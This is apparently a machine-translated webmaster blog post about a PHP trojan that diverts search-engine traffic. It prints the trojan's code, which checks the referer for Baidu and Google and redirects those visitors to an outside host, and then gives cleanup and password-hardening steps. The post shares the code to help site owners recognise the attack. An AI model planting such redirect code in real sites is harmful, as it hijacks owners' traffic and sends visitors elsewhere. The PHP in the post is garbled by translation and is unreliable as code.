検索エンジンのトラフィックを迂回させる PHP トロイの木馬の導入と防止

検索エンジンのトラフィックを迂回させる PHP トロイの木馬の導入と防止

普段はアクセス数が多くPVも高いWebサイトなのに、ある日突然PVが下がり始めたら、Webサイトのコンテンツに問題があるだけでなく、トロイの木馬に感染していないか検討する必要があります。実際、検索エンジンのトラフィックを迂回させるPHPトロイの木馬は以前からありました。簡単に言うと、アクセストラフィックが検索エンジンから来ている場合、相手方のWebサイトのファイルを自動的に取得し、ユーザーに自分のWebサイトが見られないようにするのです。

私のウェブサイトが最近このような攻撃を受けたため、このコードを共有して、このような攻撃に対して依然として警戒する必要があるウェブマスター、特に PHP プログラムを使用してウェブサイトを構築している方々に何らかのインスピレーションを与えたいと考えています。過去のデータによると、このようなトロイの木馬は珍しいものではありません。1年前、あるいは数年前にも存在していたようですが、現在その影響は以前ほど大きくないかもしれません。

以下は、検索エンジンのトラフィックを転送する攻撃コードです。

エラー報告(E_ERROR);

ヘッダー('content-Type: text/html; charset=gb2312');

$come_from="baidu.com#google.com.hk#soso.com#sogou.com#cache.baidu.com#google.cn";

$referer = Split("#",$come_from);

foreach($referer を $v として){

if(strstr($_SERVER['HTTP_REFERER'],$v))

{

ヘッダー("場所: ".'http://www.abc.com/3/nb.html?'.$_SERVER['SERVER_NAME']);

}

}

echo file_get_contents('http://www.abc.com//xx/dn2.php');

?>

コードは非常にシンプルです。アクセス元が検索エンジンの場合、以下に説明する PHP ファイルと HTML ファイルを配置するため、ユーザーが期待する結果が得られません。もちろん、サーバーごとに設定は異なり、そのようなファイルをアップロードしても実行が制限されるサーバーもありますが、問題があるので、それを解決するのが次のステップです。

以下では私の解決策について簡単に説明します。今後同様の状況に遭遇する他の人に役立つことを願っています。

最初のステップは、当然ながら、類似の PHP ファイルを削除することです。これらの PHP ファイルには固定の名前はありませんが、すべてルート ディレクトリにあるため、簡単に見つけることができます。見慣れないファイルを削除するだけです。削除した後は興奮しないでください。まず他のディレクトリに移動して、類似した見慣れないファイルを探してください。見つかった見慣れないファイルを開いて、問題がある場合は直接削除してください。

2 番目のステップは、よく使用されるシステム PHP ファイルを引き続き調べて、これらのファイルが最近変更されたかどうかを確認することです。変更されている場合は、それらをダウンロードし、最初に表示された dv.php など、以前に表示された奇妙な PHP ファイル名を探します。これで、dv.php を検索して、このように変更されたかどうかを確認できます。また、他のディレクトリには通常、実際のトロイの木馬があります。

3番目のステップでは、360ウェブサイトセキュリティテストプラットフォームにアクセスできます。アップロードされたファイルが検証されたら、ウェブサイトが安全かどうかのテストを開始できます。一般的に、ウェブサイトが黒いリンクにリンクされている場合、または目に見えないテキストがある場合は、プロンプトが表示されるため、比較的簡単に使用できます。この機能は、ブラックリンクの検出に特に適しています。ブラックリンクは一般に隠されており、ウェブマスターが考え出すのが難しいためです。

4 番目のステップは、FTP アカウントのパスワード、Web サイトのバックエンド アドレス、Web サイトのバックエンド ログイン名、またはその他のパスワードなど、弱いパスワードを変更することです。7 文字または 8 文字のみなど、パスワードが弱すぎると思われる場合は、より難しいパスワードに変更することをお勧めします。弱いパスワードがスキャンされたために、多くの Web サイトがクラックされています。パスワードの長さを増やすことは、そのような Web サイトのクラックを防ぐのに役立ちます。

ここまで書いて、話は基本的に終わりです。ウェブサイトのセキュリティは緊急です。ウェブサイトのセキュリティ問題には常に注意を払う必要があります。注意を払わないと、ブラックリンクを張っている人たちがあなたを狙うでしょう。ウェブサイトのセキュリティを常に向上させることによってのみ、ハッキングを回避することができます。この記事は、Aibue.com (http://www.aibue.com) のウェブマスターによって作成されたものです。転載または共有する場合は、出典を明記してください。ご協力ありがとうございます。

原題: 検索エンジンのトラフィックを迂回させる PHP トロイの木馬の紹介と防止

キーワード: 検索エンジン、php トロイの木馬、dedecms、phpcm、ウェブマスター、ウェブサイト、ウェブサイトのプロモーション、収益化

<<:  ウェブサイトのナビゲーションを適切に最適化すると、SEOの最適化が容易になります。

>>:  オンラインプロモーションの目的は、ブランド構築に重点を置き、ユーザーの参加を増やすことです。

推薦する

SEO 基礎チュートリアル: キーワード分類の詳細な説明

2018年最もホットなプロジェクト:テレマーケティングロボットがあなたの参加を待っていますキーワード...

否定的な情報は「2つのノーと3つの治療」の原則に従うべきである

否定的な情報は「2つのノーと3つの治療」の原則に従うべきであるネガティブな情報は企業やウェブサイトに...

Baidu の新規サイトのインデックス作成に関する問題

過去 1 か月ほど、Baidu は新しいサイトの登録を減速させています。監査パラメータはより厳しくな...

Kubernetes の一般的なネットワーク

1 Kubernetesネットワークの概要Kubernetes ネットワーキングは、異なるクラスター...

ファーウェイの石耀宏氏:産業のアップグレードの重要な10年、ファーウェイのクラウドとコンピューティングは企業の追い越し達成を支援する

6月24日、国家発展改革委員会、科学技術部、工業情報化部、国家ラジオテレビ総局、中国サイバースペース...

51CTO 限定: クラウドにあなたをご案内

8月23日、IBM 2011 Cloud Computing Summitが上海で開催されました。こ...

Tencent Cloudがオンライン教育の進化を支援

[51CTO.com オリジナル記事] 6月7日と8日の「大学入試戦争」が全国を席巻した。候補者は全...

草の根の 2B ビジネス経験: 誠実さ、スキル、そして低 B スタイル

ネットには2B(ToB)に関する記事が溢れている。Dark Horse Competitionでは「...

Dreamweaver のドキュメント アンカー テキスト リンクの数に対する解決策

Dedecms ドキュメントのキーワードメンテナンスにおける頻度とは何を意味しますか? インターネッ...

licloud: 月額 39 ドル、香港物理サーバー、30M 帯域幅、e3-1230v3/16G メモリ/1T ハードディスク

licloud からの公式ニュース: 現在、香港データセンターの約 100 台の物理マシン (香港サ...

QQスペースのランキングを良くする方法を分析する

前回、徐国祥氏の「QQ空間の分析はBaiduのキーワードのランキング付けに使用できるか?」という記事...

オリジナルコンテンツがウェブサイトの最適化に与える3つの主な影響について簡単に説明します。

ウェブマスターなら誰でも、オリジナル コンテンツの最も魅力的な機能の 1 つは、ウェブサイトのランキ...

bgpto: 日本の専用サーバーが 35% オフ (120 ドルから)、シンガポールの専用サーバーが 25% オフ (93 ドルから)

bgp.to は、東京の専用サーバーを月額 120 ドルからという永久 35% 割引でご提供していま...

知っておくべき Kubernetes の機能 10 選

Kubernetes は現在、Google、Shopify、Slack など、世界最大手の事業者が使...

トップ 10 B2C ウェブサイトのショッピング カート プロセス設計の比較分析

ショッピング カートは、サイト全体のコンバージョン率とユーザー エクスペリエンスの向上に非常に役立つ...